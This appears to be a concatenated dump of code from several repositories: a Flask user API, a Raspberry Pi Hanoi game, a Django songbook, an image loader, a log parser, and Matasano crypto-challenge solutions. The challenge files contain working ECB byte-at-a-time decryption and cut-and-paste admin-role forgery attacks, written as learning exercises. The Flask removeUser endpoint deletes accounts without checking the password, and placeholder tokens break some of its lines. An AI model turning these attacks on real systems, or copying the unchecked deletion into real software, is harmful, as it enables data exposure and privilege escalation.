            abort(400)
        if request.headers['Content-Type'] != 'application/json':
            abort(400)
        password = <PASSWORD>('password')
        smsdata = request.json.get('smsdata')
        email = request.json.get('email')
        dob = request.json.get('dob')
        username = request.json.get('username')
        state = request.json.get('state')
        mobileNo = request.json.get('mobileNo')
        if mobileNo.startswith('0'):
            mobileNo = mobileNo[1:]
        if mobileNo.startswith('+254'):
            mobileNo = mobileNo[4:]
        try:
            user = r.table('UsersInfo').get(str(username)).update({"email": email, "smscode": smsdata, "state": state, "dob": dob, "mobileNo": mobileNo}).run(g.rdb_conn)
            resp = make_response(jsonify({"OK": "User Updated"}), 202)
            resp.headers['Content-Type'] = "application/json"
            resp.cache_control.no_cache = True
            return resp
        except RqlError:
            logging.warning('DB code verify failed on /profile/api/' + username)
            resp = make_response(jsonify({"Error": "503 DB error"}), 503)
            resp.headers['Content-Type'] = "application/json"
            resp.cache_control.no_cache = True
            return resp
    try:
        user = r.table('UsersInfo').get(str(username)).run(g.rdb_conn)
        name = str(user['username'])
        state = str(user['state'])
        smscode = str(user['smscode'])
        password = str(user['password'])
        email = str(user['email'])
        mobileNo = str(user['mobileNo'])
    except RqlError:
        logging.warning('DB code verify failed on /profile/' + mobileNo)
        resp = make_response(jsonify({"Error": "503 DB error"}), 503)
        resp.headers['Content-Type'] = "application/json"
        resp.cache_control.no_cache = True
        return resp
    return render_template(
        'profile.html', name=name, email=email, smscode=smscode,
        state=state, username=username, mobileNo=mobileNo)


@app.route('/api/removeUser/', methods=['POST'])
def removeUser():
    if not request.json:
        abort(400)
    if request.headers['Content-Type'] != 'application/json':
        abort(400)
    password = request.json.<PASSWORD>('password')
    username = request.json.get('username')
    try:
        r.table('UsersInfo').get(username).delete().run(g.rdb_conn)
    except RqlError:
        logging.warning('DB remove user failed on /api/removeUser')
    resp = make_response(jsonify({'OK': 'Content Removed'}), 202)
    resp.headers['Content-Type'] = "application/json"
    resp.cache_control.no_cache = True
    return resp


@app.route('/api/UserInfo/', methods=['POST'])
def addUser():
    if not request.json:
        abort(400)
    if request.headers['Content-Type'] != 'application/json':
        abort(400)
    # get JSON engine params
    fname = request.json.get('fname')
    lname = request.json.get('lname')
    username = request.json.get('username')
    mobileNo = request.json.get('mobileNo')
    state = request.json.get('state')
    location = request.json.get('location')
    email = request.json.get('email')
    if mobileNo.startswith('0'):
        mobileNo = mobileNo[1:]
    if mobileNo.startswith('+254'):
        mobileNo = mobileNo[4:]
    try:
        r.table('UsersInfo').insert({
            'fname': fname,
            'lname': lname,
            'mobileNo': mobileNo,
            'email': email,
            'state': state,
            'userVerified': 'False',
            'location': location
        }).run(g.rdb_conn)
    except RqlError:
        logging.warning('DB could not write on /api/adduser')
    resp = make_response(jsonify({"OK": "Content Saved"}), 202)
    resp.headers['Content-Type'] = "application/json"
    resp.cache_control.no_cache = True
    return resp


@app.route('/reset/', methods=['POST', 'GET'])
def forgotPassword():
    if request.method == 'POST':
        if not request.json:
            abort(400)
        if request.headers['Content-Type'] != 'application/json':
            abort(400)
        email = request.json.get('email')
        try:
            user = r.table('UsersInfo').filter({"email": email}).limit(1).pluck('username').run(g.rdb_conn)
            if user is None:
                resp = make_response(jsonify({'Missing': 'Not Found'}), 400)
                resp.headers['Content-Type'] = "application/json"
                resp.cache_control.no_cache = True
                return resp
            new_password = <PASSWORD>(<PASSWORD>, 9<PASSWORD>)
            new_password = str(<PASSWORD>)
            hashed_password = hashlib.sha512(new_password + salt).hexdigest()
            data = []
            for el in user:
                data.append(el)
            username = data[0]['username']
            r.table('UsersInfo').get(username).update({"password": <PASSWORD>}).run(g.rdb_conn)
            # sendMail.passwordReset(email, new_password)
        except RqlError:
            logging.warning('DB pass reset failed on /reset/')
        resp = make_response(jsonify({'OK': 'Email Sent'}), 200)
        resp.headers['Content-Type'] = "application/json"
        resp.cache_control.no_cache = True
        return resp
    return render_template('forgot-pass.html')
```
{ "source": "8ToThePowerOfMol/arduino-raspberry-puzzles", "score": 2 }
#### File: arduino-raspberry-puzzles/hanoi_puzzle/hanoi.py
```python
import RPi.GPIO as GPIO
import time

GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)

## GPIO Setting:
## leds:
## 2 17 14 10
## 3 27 15 9
## 4 22 18 11
##
## buttons:
## 25
## 8
## 7
## 23 (reset)
## 24 (buzzer)
GPIO.setup(2, GPIO.OUT)
GPIO.setup(3, GPIO.OUT)
GPIO.setup(4, GPIO.OUT)
GPIO.setup(17, GPIO.OUT)
GPIO.setup(27, GPIO.OUT)
GPIO.setup(22, GPIO.OUT)
GPIO.setup(14, GPIO.OUT)
GPIO.setup(15, GPIO.OUT)
GPIO.setup(18, GPIO.OUT)
GPIO.setup(10, GPIO.OUT)
GPIO.setup(9, GPIO.OUT)
GPIO.setup(11, GPIO.OUT)
GPIO.setup(7, GPIO.IN)
GPIO.setup(8, GPIO.IN)
GPIO.setup(25, GPIO.IN)
GPIO.setup(23, GPIO.IN)
GPIO.setup(24, GPIO.OUT)

GPIO.output(4, GPIO.LOW)
GPIO.output(22, GPIO.LOW)
GPIO.output(18, GPIO.LOW)
GPIO.output(11, GPIO.LOW)
GPIO.output(3, GPIO.LOW)
GPIO.output(27, GPIO.LOW)
GPIO.output(15, GPIO.LOW)
GPIO.output(9, GPIO.LOW)
GPIO.output(2, GPIO.LOW)
GPIO.output(17, GPIO.LOW)
GPIO.output(14, GPIO.LOW)
GPIO.output(10, GPIO.LOW)
GPIO.output(4, GPIO.HIGH)
GPIO.output(22, GPIO.HIGH)
GPIO.output(18, GPIO.HIGH)
GPIO.output(11, GPIO.HIGH)
GPIO.output(24, GPIO.LOW)

a = [0, 0, 0, 0]
b = [0, 0, 0, 0]
c = [1, 1, 1, 1]
# x={a[0]: 2, a[1]: 17, a[2]: 14, a[3]: 10, b[0]: 3, b[1]: 27, b[2]: 15, b[3]: 9, c[0]: 4, c[1]: 22, c[2]: 18, c[3]: 11}


def swap(A, B):
    try:
        i = A.index(1)
    except ValueError:
        i = 4
    try:
        j = B.index(1)
    except ValueError:
        j = 4
    if i <= j:
        A[i], B[i] = B[i], A[i]
        return i
    else:
        print("Cannot swap!")
        return -1


def get_pin(tower, i):
    if tower == 1:
        if i == 0:
            return 2
        elif i == 1:
            return 17
        elif i == 2:
            return 14
        elif i == 3:
            return 10
        else:
            print("Pin error!")
            return -1
    elif tower == 2:
        if i == 0:
            return 3
        elif i == 1:
            return 27
        elif i == 2:
            return 15
        elif i == 3:
            return 9
        else:
            print("Pin error!")
            return -1
    elif tower == 3:
        if i == 0:
            return 4
        elif i == 1:
            return 22
        elif i == 2:
            return 18
        elif i == 3:
            return 11
        else:
            print("Pin error!")
            return -1
    else:
        print("Pin error!")
        return -1


def reset():
    GPIO.output(4, GPIO.LOW)
    GPIO.output(22, GPIO.LOW)
    GPIO.output(18, GPIO.LOW)
    GPIO.output(11, GPIO.LOW)
    GPIO.output(3, GPIO.LOW)
    GPIO.output(27, GPIO.LOW)
    GPIO.output(15, GPIO.LOW)
    GPIO.output(9, GPIO.LOW)
    GPIO.output(2, GPIO.LOW)
    GPIO.output(17, GPIO.LOW)
    GPIO.output(14, GPIO.LOW)
    GPIO.output(10, GPIO.LOW)
    time.sleep(2)
    GPIO.output(4, GPIO.HIGH)
    GPIO.output(22, GPIO.HIGH)
    GPIO.output(18, GPIO.HIGH)
    GPIO.output(11, GPIO.HIGH)
    time.sleep(.5)
    GPIO.output(4, GPIO.LOW)
    GPIO.output(22, GPIO.LOW)
    GPIO.output(18, GPIO.LOW)
    GPIO.output(11, GPIO.LOW)
    time.sleep(.5)
    GPIO.output(3, GPIO.HIGH)
    GPIO.output(27, GPIO.HIGH)
    GPIO.output(15, GPIO.HIGH)
    GPIO.output(9, GPIO.HIGH)
    time.sleep(.5)
    GPIO.output(3, GPIO.LOW)
    GPIO.output(27, GPIO.LOW)
    GPIO.output(15, GPIO.LOW)
    GPIO.output(9, GPIO.LOW)
    time.sleep(.5)
    GPIO.output(2, GPIO.HIGH)
    GPIO.output(17, GPIO.HIGH)
    GPIO.output(14, GPIO.HIGH)
    GPIO.output(10, GPIO.HIGH)
    time.sleep(.5)
    GPIO.output(2, GPIO.LOW)
    GPIO.output(17, GPIO.LOW)
    GPIO.output(14, GPIO.LOW)
    GPIO.output(10, GPIO.LOW)
    time.sleep(.5)
    GPIO.output(4, GPIO.HIGH)
    GPIO.output(22, GPIO.HIGH)
    GPIO.output(18, GPIO.HIGH)
    GPIO.output(11, GPIO.HIGH)
    print("Reset done!")


def beep():
    GPIO.output(24, GPIO.HIGH)
    time.sleep(.03)
    GPIO.output(24, GPIO.LOW)


is_any_button_pressed = False
while a != [1, 1, 1, 1]:
    while (GPIO.input(25) == False) or (GPIO.input(8) == False) or (GPIO.input(7) == False) or (GPIO.input(23) == False):
        time.sleep(.3)
    print(a, b, c, sep='\n')
    is_any_button_pressed = False
    while 1:
        if not is_any_button_pressed:
            if (GPIO.input(25) == False):
                source = int(1)
                is_any_button_pressed = True
                print("source =", source)
                beep()
                break
            elif (GPIO.input(8) == False):
                source = int(2)
                is_any_button_pressed = True
                print("source =", source)
                beep()
                break
            elif (GPIO.input(7) == False):
                source = int(3)
                is_any_button_pressed = True
                print("source =", source)
                beep()
                break
            elif (GPIO.input(23) == False):
                source = int(0)
                is_any_button_pressed = True
                print("source =", source)
                beep()
                break
            else:
                pass
    while (GPIO.input(25) == False) or (GPIO.input(8) == False) or (GPIO.input(7) == False) or (GPIO.input(23) == False):
        time.sleep(.3)
    is_any_button_pressed = False
    while 1:
        if not is_any_button_pressed:
            if (GPIO.input(25) == False):
                dest = int(1)
                is_any_button_pressed = True
                print("dest =", dest)
                beep()
                break
            elif (GPIO.input(8) == False):
                dest = int(2)
                is_any_button_pressed = True
                print("dest =", dest)
                beep()
                break
            elif (GPIO.input(7) == False):
                dest = int(3)
                is_any_button_pressed = True
                print("dest =", dest)
                beep()
                break
            elif (GPIO.input(23) == False):
                dest = int(0)
                is_any_button_pressed = True
                print("dest =", dest)
                beep()
                break
            else:
                pass
    if source == 0 or dest == 0:
        reset()
        a = [0, 0, 0, 0]
        b = [0, 0, 0, 0]
        c = [1, 1, 1, 1]
        i = -1
        beep()
    # switch for all possibilities of swapping inside the arrays:
    elif source == 1 and dest == 2:
        i = swap(a, b)
    elif source == 1 and dest == 3:
        i = swap(a, c)
    elif source == 2 and dest == 1:
        i = swap(b, a)
    elif source == 2 and dest == 3:
        i = swap(b, c)
    elif source == 3 and dest == 1:
        i = swap(c, a)
    elif source == 3 and dest == 2:
        i = swap(c, b)
    else:
        print("Cannot swap!")
        i = -1
    if i != -1:
        zhas = get_pin(source, i)
        rozs = get_pin(dest, i)
        GPIO.output(zhas, GPIO.LOW)
        GPIO.output(rozs, GPIO.HIGH)
    else:
        print("Pin is not searching!")

print("YOU WON!")
GPIO.output(24, GPIO.HIGH)
for k in range(10):
    beep()
    time.sleep(.1)
GPIO.cleanup()
```
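A quick desk-check of `swap` away from the hardware; the lists model the LED columns, with 1 marking a disk (toy values chosen for the demo):

```python
a, c = [0, 0, 0, 0], [1, 1, 1, 1]
i = swap(c, a)     # top disk of c (index 0) moves onto the empty tower a
print(i, a, c)     # 0 [1, 0, 0, 0] [0, 1, 1, 1]
print(swap(c, a))  # now c's top index 1 > a's top index 0 -> "Cannot swap!" and -1
```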
{ "source": "8ToThePowerOfMol/dvojkarsky_zpevnik_web", "score": 3 }
#### File: dvojkarsky_zpevnik/homepage/utils.py
```python
import os
import re
import shutil


def get_songs_in_songbook_old():
    songbook_name = os.path.join("..", "..", "DvojkarskyZpevnik", "Cely_zpevnik", "Zpevnik.tex")
    if os.path.isfile(songbook_name):
        with open(songbook_name, "r", encoding="UTF-8") as f:
            content = list(filter(lambda x: re.search("\\\importsong\{.*\}\{.*\}", x), f.readlines()))
            return {x.split("{")[1].split("}")[0]: x.split("{")[2].split("}")[0] for x in content}
    return {}


def _cleanlatex(raw):
    cleantext = re.sub(re.compile("\\\[^\^\& ]*"), '', raw)
    cleantext = re.sub(re.compile("%%.*"), '', cleantext)
    cleantext = cleantext.replace(" }", " ")
    return cleantext


def get_songname_from_texfile(file):
    with open(file, "r") as f:
        for line in f.readlines():
            if "title=" in line:
                content = line
                break
    songname = _cleanlatex(content.split("\\\\")[0])
    songauthor = _cleanlatex(content.split("\\\\")[1]) if "\\\\" in content else ""
    ret = "{} ({})".format(songname, songauthor)
    ret = re.sub(re.compile("\(\s*"), "(", ret)
    ret = re.sub(re.compile("\s*\)"), ")", ret)
    ret = ret.replace(" ()", "")
    ret = re.sub(re.compile("\s*$"), "", ret)
    return ret


def get_songs_in_songbook():
    songs_dir = os.path.join("..", "..", "DvojkarskyZpevnik", "songy")
    songs = os.listdir(songs_dir)
    songs = list(filter(lambda x: not x.startswith("0") and not x.startswith("ZZ") and x.endswith(".tex"), songs))
    songs.sort()
    return {get_songname_from_texfile(os.path.join(songs_dir, x)): x for x in songs}


def _clean_songs(songs_id, tex_path):
    for f in list(filter(lambda x: songs_id in x, os.listdir(tex_path))):
        os.remove(os.path.join(tex_path, f))


def produce_songs_pdf(songs_dict):
    files_to_typeset = [x for (x, y) in filter(lambda x: x[1], songs_dict)]
    tex_dir = os.path.join("..", "..", "DvojkarskyZpevnik", "web")
    # Lazy loading -- if we made given songlist before, just return its pdf
    songs_id = str(hash(str(files_to_typeset)))
    result_path = os.path.join(tex_dir, "pdfs", songs_id + ".pdf")
    if songs_id + ".pdf" in os.listdir(os.path.join(tex_dir, "pdfs")):
        return result_path, None
    # Prepare .tex file with songs
    songsfile = os.path.join(tex_dir, songs_id + "songs.tex")
    with open(songsfile, "w", encoding="UTF-8") as f:
        for x in files_to_typeset:
            f.write("\\input{../songy/" + x + "}\\newpage\n")
    # Copy generator file with linking to songfile
    genfile = os.path.join(tex_dir, songs_id + ".tex")
    with open(os.path.join(tex_dir, "generator.tex"), "r") as f:
        content = f.readlines()
    content[186] = "\\input{" + songs_id + "songs.tex}\n"
    with open(genfile, "w") as f:
        f.writelines(content)
    # Typeset song
    os.system("TEXINPUTS=.:{}/:{}/:$TEXINPUTS pdflatex -synctex=1 -interaction=batchmode -output-directory {}/ {}".format(
        os.path.abspath(tex_dir), os.path.join("..", "..", "DvojkarskyZpevnik"), tex_dir, genfile))
    pdffile = os.path.join(tex_dir, songs_id + ".pdf")
    if not os.path.isfile(pdffile):
        logfile = os.path.join(tex_dir, songs_id + ".log")
        content = None
        if os.path.isfile(logfile):
            with open(os.path.join(logfile), "r") as f:
                content = f.readlines()
        _clean_songs(songs_id, tex_dir)
        return None, content
    shutil.copy2(pdffile, result_path)
    _clean_songs(songs_id, tex_dir)
    return result_path, None
```
#### File: dvojkarsky_zpevnik/homepage/views.py
```python
import os

from django.shortcuts import render
from django.views.generic import TemplateView

from .forms import SongsForm
from .utils import produce_songs_pdf
from django.http import HttpResponse, Http404


def download(request, path):
    if os.path.exists(path):
        with open(path, 'rb') as fh:
            response = HttpResponse(fh.read(), content_type="application/pdf")
            response['Content-Disposition'] = 'inline; filename=' + os.path.basename(path)
            return response
    raise Http404


# View part
def home(request):
    return render(request, 'homepage/home.html')


class DownloadView(TemplateView):
    template_name = 'homepage/download.html'

    def get(self, request, *args, **kwargs):
        form = SongsForm()
        return render(request, self.template_name, {"form": form})

    def post(self, request):
        form = SongsForm(request.POST)
        if form.is_valid():
            songpdf, log = produce_songs_pdf(form.checkboxes())
            if songpdf is None:
                if log is None:
                    return render(request, 'homepage/message.html', {"text": "Nejde přeložit pdfko :-("})
                return render(request, 'homepage/message.html', {"text": log})
            return download(request, songpdf)
            # return render(request, 'homepage/message.html', {"text": log})
        return render(request, self.template_name, {"form": form})
```
{ "source": "8u1a/my_matasano_crypto_challenges", "score": 3 }
#### File: my_matasano_crypto_challenges/set2/challenge12.py
```python
__author__ = 'christianbuia'

import random
from Crypto.Cipher import AES
import base64


def pkcs7_padding(message_bytes, block_size):
    pad_length = block_size - (len(message_bytes) % block_size)
    if pad_length != block_size:
        for i in range(0, pad_length):
            message_bytes += bytes([pad_length])
    return message_bytes
#-----------------------------------------------------------------------------------------------------------------------


def generateRandom16bytes():
    ints = []
    for i in range(16):
        ints.append(random.randint(0, 255))
    return bytes(ints)
#-----------------------------------------------------------------------------------------------------------------------


#always 16 bytes
def encrypt_aes128(message, key):
    decobj = AES.new(key, AES.MODE_ECB)
    return decobj.encrypt(pkcs7_padding(message, 16))
#-----------------------------------------------------------------------------------------------------------------------


#attempt to detect ECB by looking for identical blocks
def detectEBC(cipher, block_size):
    blocks = []
    for i in range(int(len(cipher) / block_size)):
        blocks.append(cipher[i * block_size:i * block_size + block_size])
    #detecting if dups exist: http://stackoverflow.com/questions/9835762/find-and-list-duplicates-in-python-list
    if (len(set([x for x in blocks if blocks.count(x) > 1]))) > 0:
        return True
    else:
        return False
#-----------------------------------------------------------------------------------------------------------------------


def ecb_oracle(mytext, plaintext):
    cipher = encrypt_aes128(mytext + plaintext, global_key)
    return cipher
#-----------------------------------------------------------------------------------------------------------------------


#detect block size by feeding the oracle a single byte to encrypt, and then inspecting the length of the cipher
#this assumes a single byte will be represented by a single block of the cipher (pretty safe assumption methinks,
#requires that the oracle won't prepend random bytes of size >= to the block size).
def detect_oracle_block_size(oracle_func):
    cipher = oracle_func(bytes("A", "ascii"), bytes("", "ascii"))
    return len(cipher)
#-----------------------------------------------------------------------------------------------------------------------


#detect oracle is ecb by feeding the oracle with homogeneous plaintext with length equal to exactly 4x the block length,
#then comparing the 2nd & 3rd cipher blocks. identical cipher blocks indicate the oracle generates ecb ciphers.
#using blocks 2 & 3 in case of random prefixes (of size less than block size) prepended to the plaintext by the oracle
def detect_oracle_is_ecb(oracle_func, block_size):
    ints = [ord("A") for x in range(block_size * 4)]
    cipher = oracle_func(bytes(ints), bytes("", "ascii"))
    if cipher[block_size:block_size * 2 - 1] == cipher[block_size * 2:block_size * 3 - 1]:
        return True
    else:
        return False
#-----------------------------------------------------------------------------------------------------------------------


def detect_plaintext_padding_size(oracle_func, plaintext, block_size):
    count = 0
    mytext = b""
    observed_blocks = None
    while True:
        cipher = oracle_func(mytext, plaintext)
        next_observed_blocks = len(cipher) / block_size
        if observed_blocks != None and observed_blocks < next_observed_blocks:
            break
        observed_blocks = next_observed_blocks
        mytext += bytes("A", "ascii")
        count += 1
    return (count - 1)
#-----------------------------------------------------------------------------------------------------------------------


def crack_ecb(oracle_func, plaintext):
    #detect block size
    block_size = detect_oracle_block_size(oracle_func)
    #detect oracle is ECB
    if detect_oracle_is_ecb(oracle_func, block_size) is not True:
        print("oracle was determined to not be ECB. Exiting.")
        exit(1)
    #detect size of padding
    padding_size = detect_plaintext_padding_size(oracle_func, plaintext, block_size)
    size_of_unaltered_cipher = len(oracle_func(b"", plaintext))
    number_of_blocks = int(size_of_unaltered_cipher / block_size)
    #the solved plain text we accumulate and return
    solved_plain_text = b""
    for block_number in range(number_of_blocks):
        #generally we do a full block_size cycle of attack arrays...
        #unless it's the last block, in which case we subtract padding.
        if block_number == number_of_blocks - 1:
            iters = block_size - padding_size
        else:
            iters = block_size
        for byte_number in range(iters):
            #generate a homogeneous string of bytes that is of size block_size - 1 - (the number of solved bytes)
            ints = [ord("A") for i in range(block_size - 1 - byte_number)]
            attack_array = bytes(ints)
            just_short_array = attack_array + solved_plain_text
            last_byte_dict = {}
            #ordinal for all ascii (0-127)
            for i in range(0, 127 + 1):
                last_byte_dict[i] = oracle_func(just_short_array, bytes([i]))
            cipher = oracle_func(attack_array, plaintext)
            for i in last_byte_dict.__iter__():
                if last_byte_dict[i] == cipher[:block_size * (block_number + 1)]:
                    solved_plain_text += bytes([i])
    return solved_plain_text
#***********************************************************************************************************************


global global_key
global_key = generateRandom16bytes()

b64_unknown_string = """<KEY>""".replace("\n", "")

#prep the plaintext, though we don't want to know what it is yet
#(we are going to use the oracle to crack encrypted versions of the plaintext)
unknown_string = base64.b64decode(b64_unknown_string)
plaintext = bytes(unknown_string)

print(crack_ecb(ecb_oracle, plaintext))
```
#### File: my_matasano_crypto_challenges/set2/challenge13.py
```python
__author__ = 'christianbuia'

import random
from Crypto.Cipher import AES


def pkcs7_padding(message_bytes, block_size):
    pad_length = block_size - (len(message_bytes) % block_size)
    if pad_length != block_size:
        for i in range(0, pad_length):
            message_bytes += bytes([pad_length])
    return message_bytes
#-----------------------------------------------------------------------------------------------------------------------


def generateRandom16bytes():
    ints = []
    for i in range(16):
        ints.append(random.randint(0, 255))
    return bytes(ints)
#-----------------------------------------------------------------------------------------------------------------------


#always 16 bytes
def encrypt_aes128(message, key):
    decobj = AES.new(key, AES.MODE_ECB)
    return decobj.encrypt(pkcs7_padding(message, 16))
#-----------------------------------------------------------------------------------------------------------------------


#always 16 bytes
def decrypt_aes128(message, key):
    decobj = AES.new(key, AES.MODE_ECB)
    return strip_pkcs7_padding(decobj.decrypt(message), 16)
#-----------------------------------------------------------------------------------------------------------------------


def strip_pkcs7_padding(message, blocksize):
    number_of_blocks = len(message) / blocksize
    for i in range(1, blocksize):
        clean = True
        for j in range(i):
            if message[int(blocksize * (number_of_blocks - 1) + (blocksize - 1 - j))] != i:
                clean = False
        if clean == True:
            return message[:-i]
    return message
#-----------------------------------------------------------------------------------------------------------------------


def parseKV(message):
    kv_dict = {}
    pairs = message.split("&")
    for p in pairs:
        items = p.split("=")
        kv_dict[items[0]] = items[1]
    return kv_dict
#-----------------------------------------------------------------------------------------------------------------------


def profile_for(email_address, uid=10, role='user'):
    if "@" not in email_address:
        print("not a valid email...quitting.")
        exit(1)
    email_address = email_address.replace("&", "").replace("=", "")
    return "email=" + email_address + "&uid=" + str(uid) + "&role=" + role
#-----------------------------------------------------------------------------------------------------------------------


def profile_for_encrypted(email_address, key, uid=10, role='user'):
    return encrypt_aes128(bytes(profile_for(email_address, uid, role), "ascii"), key)
#-----------------------------------------------------------------------------------------------------------------------
#***********************************************************************************************************************

ckey = generateRandom16bytes()

#the admin block we want looks like this:
#admin\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b
#and we can snag that by making this the beginning of our email address, e.g.:
#AAAAAAAAAAadmin\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\[email protected]
#and grabbing the second block (since the first block will be "email=AAAAAAAAAA")
#and then this can be appended to a message that is an exact multiple of block size, e.g.:
#email=<EMAIL>&uid=10&role=

#grab the second block of our special message, which is the admin block
admin_block = profile_for_encrypted("AAAAAAAAAAadmin\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\[email protected]", ckey)[16:32]

#get the target message we want to tamper with:
cipher_target = profile_for_encrypted("<EMAIL>", ckey)

#splice
cipher_tampered = cipher_target[:len(cipher_target) - 16] + admin_block

#test
print(decrypt_aes128(cipher_tampered, ckey).decode("ascii"))
```
#### File: my_matasano_crypto_challenges/set2/challenge9.py
```python
__author__ = 'christianbuia'


def pkcs7_padding(message_bytes, block_size):
    pad_length = block_size - (len(message_bytes) % block_size)
    if pad_length != block_size:
        for i in range(0, pad_length):
            message_bytes.append(pad_length)
    return message_bytes
#=======================================================================================================================

print(pkcs7_padding(bytearray("YELLOW SUBMARINE", "utf-8"), 20))
print(pkcs7_padding(bytearray("YELLOW SUBMARINE", "utf-8"), 21))
print(pkcs7_padding(bytearray("WE ALL LIVE IN A YELLOW SUBMARINE", "utf-8"), 20))
print(pkcs7_padding(bytearray("WE ALL LIVE IN A YEL", "utf-8"), 20))
```
{ "source": "8vana/8vana", "score": 3 }
#### File: 1vana/modules/imageloader.py
```python
from PIL import Image


class ImageLoader:
    debug = 0
    rgb_color = {
        "black": (0, 0, 0),
        "darkblue": (29, 43, 83),
        "darkpurple": (126, 37, 83),
        "darkgreen": (0, 135, 81),
        "brown": (171, 82, 54),
        "darkgray": (95, 87, 79),
        "lightgray": (194, 195, 199),
        "white": (255, 241, 232),
        "red": (255, 0, 77),
        "orange": (255, 163, 0),
        "yellow": (255, 236, 39),
        "green": (0, 228, 54),
        "blue": (41, 173, 255),
        "indigo": (131, 118, 156),
        "pink": (255, 119, 168),
        "peach": (255, 204, 170)
    }
    color = {
        "black": 0,
        "darkblue": 1,
        "darkpurple": 2,
        "darkgreen": 3,
        "brown": 4,
        "darkgray": 5,
        "lightgray": 6,
        "white": 7,
        "red": 8,
        "orange": 9,
        "yellow": 10,
        "green": 11,
        "blue": 12,
        "indigo": 13,
        "pink": 14,
        "peach": 15
    }

    def __init__(self, infile):
        self.infile = infile
        self.width = 0
        self.height = 0
        self.map = []

    def judge(self, rgb):
        """Determine the pyxel color number from an RGB tuple."""
        result = 16
        for k in (ImageLoader.rgb_color):
            if (ImageLoader.rgb_color[k] == rgb):
                result = ImageLoader.color[k]
                break
        return result

    def getpix(self, img):
        width, height = img.size
        pixels = []
        for y in range(height):
            for x in range(width):
                rgb = img.getpixel((x, y))
                pixels.append(self.judge(rgb))
        return pixels

    def show(self, pixmap, width=32):
        i = 0
        for p in (pixmap):
            if i % width == 0:
                print("")
            print("%2d" % (p), end="")
            i += 1

    def get_size(self):
        return [self.width, self.height]

    def get_pixelmap(self):
        """Return a map of pyxel color indexes."""
        img = Image.open(self.infile)
        width, height = img.size
        self.width = width
        self.height = height
        if img.mode != "RGB":
            img = img.convert("RGB")
        pixmap = self.getpix(img)
        self.map = pixmap
        return self.map
```
#### File: 8vana/common/Ultimate_Log_parser.py
```python
import os
import sys
import codecs
import json
import re
import time
import configparser
from datetime import datetime

# Type of printing.
OK = 'ok'          # [*]
NOTE = 'note'      # [+]
FAIL = 'fail'      # [-]
WARNING = 'warn'   # [!]
NONE = 'none'      # No label.


# Parser class.
class Parser:
    def __init__(self):
        self.file_name = os.path.basename(__file__)
        self.full_path = os.path.dirname(os.path.abspath(__file__))
        self.root_path = os.path.join(self.full_path, '..')

        # Read config.ini.
        config = configparser.ConfigParser()
        config.read(os.path.join(self.full_path, 'config.ini'), encoding='utf-8')

        try:
            self.date_format = config['Common']['date_format']
            self.default_charset = config['Common']['default_charset']
            self.watch_period = int(config['Common']['watch_period'])
            if self.watch_period < 5:
                print('Watching period is too short. >= 5[s]')
                self.watch_period = 5
            origin_log_dir = os.path.join(self.root_path, config['LogParser']['origin_log_path'])
            self.origin_log_path = os.path.join(origin_log_dir, config['LogParser']['origin_log_file'])
            converted_log_dir = os.path.join(self.root_path, config['LogParser']['converted_log_path'])
            self.converted_log_path = os.path.join(converted_log_dir, config['LogParser']['converted_log_file'])
            self.divide_regex = config['LogParser']['divide_regex']
            self.date_regex = config['LogParser']['date_regex']
            self.phase_regex = config['LogParser']['phase_regex']
            self.action_regex = config['LogParser']['action_regex']
            self.note_regex = config['LogParser']['note_regex']
            self.from_regex = config['LogParser']['from_regex']
            self.to_regex = config['LogParser']['to_regex']
            self.fire_regex_list = config['LogParser']['fire_regex'].split('@')
        except Exception as e:
            print('Reading config.ini is failure : {}'.format(e))
            sys.exit(1)

    # Add log to JSON file.
    def append_json_to_file(self, data):
        with codecs.open(self.converted_log_path, mode='a', encoding=self.default_charset) as fout:
            fout.seek(0, 2)
            if fout.tell() == 0:
                fout.write(json.dumps([data], indent=4))
            else:
                fout.seek(-1, 2)
                fout.truncate()
                fout.write(' , ')
                fout.write(json.dumps(data, indent=4))
                fout.write(']')
        print('Wrote logs: {}'.format(data))

    # Parse log.
    def parse_log(self, contents):
        # Extract response time from log.
        all_logs = re.split(self.divide_regex, contents)
        with codecs.open(self.converted_log_path, mode='a', encoding='utf-8') as fout:
            parsed_logs = []
            for log in all_logs:
                fire_flag = False
                phase = re.findall(self.phase_regex, log)
                attack = re.findall(self.action_regex, log)
                date = re.findall(self.date_regex, log)
                src = re.findall(self.from_regex, log)
                dest = re.findall(self.to_regex, log)
                note = re.findall(self.note_regex, log)
                if len(date) != 0 and len(phase) != 0 and len(attack) != 0 and len(note) != 0 and len(src) != 0 and len(dest) != 0:
                    if note[0] != '':
                        for fire_regex in self.fire_regex_list:
                            result = re.findall(fire_regex, note[0])
                            if len(result) != 0:
                                fire_flag = True
                                break
                    date_epoc = datetime.strptime(date[0], self.date_format).timestamp()
                    log_content = {'phase': phase[0], 'attack': attack[0], 'time': date_epoc, 'from': src[0], 'to': dest[0], 'note': {'option': note[0], 'CVE': fire_flag}}
                    self.append_json_to_file(log_content)
        return parsed_logs

    # Monitor log files.
    def watch(self, read_start_byte):
        # Check updated date of target log.
        if os.path.exists(self.origin_log_path):
            # Read log.
            with codecs.open(self.origin_log_path, mode='r', encoding='utf-8') as fin:
                fin.seek(read_start_byte)
                content = fin.read()
            return content
        else:
            return ''


# main.
if __name__ == '__main__':
    file_name = os.path.basename(__file__)
    full_path = os.path.dirname(os.path.abspath(__file__))

    # Create instance.
    parser = Parser()

    # Watching loop.
    read_start_byte = 0
    while True:
        log_contents = parser.watch(read_start_byte)
        if len(log_contents) != 0:
            read_start_byte += len(log_contents)
            parsed_log_list = parser.parse_log(log_contents)

        # Wait.
        print('waiting.. {}[s]'.format(parser.watch_period))
        time.sleep(parser.watch_period)
```
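The actual regex patterns live in config.ini and are not part of this snippet, so here is a hedged sketch of the per-line extraction step with made-up stand-in patterns and a made-up log line (none of these values come from the repository):

```python
import re

# Hypothetical stand-ins for the config['LogParser'] patterns.
date_regex = r'(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2})'
from_regex = r'from=(\S+)'
to_regex = r'to=(\S+)'

log = '2020/01/02 03:04:05 from=10.0.0.1 to=10.0.0.2 exploit ok'
print(re.findall(date_regex, log), re.findall(from_regex, log), re.findall(to_regex, log))
# ['2020/01/02 03:04:05'] ['10.0.0.1'] ['10.0.0.2']
```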
{ "source": "8-vishal/Covid-19_Visualizer", "score": 3 }
#### File: 8-vishal/Covid-19_Visualizer/main.py
```python
import numpy
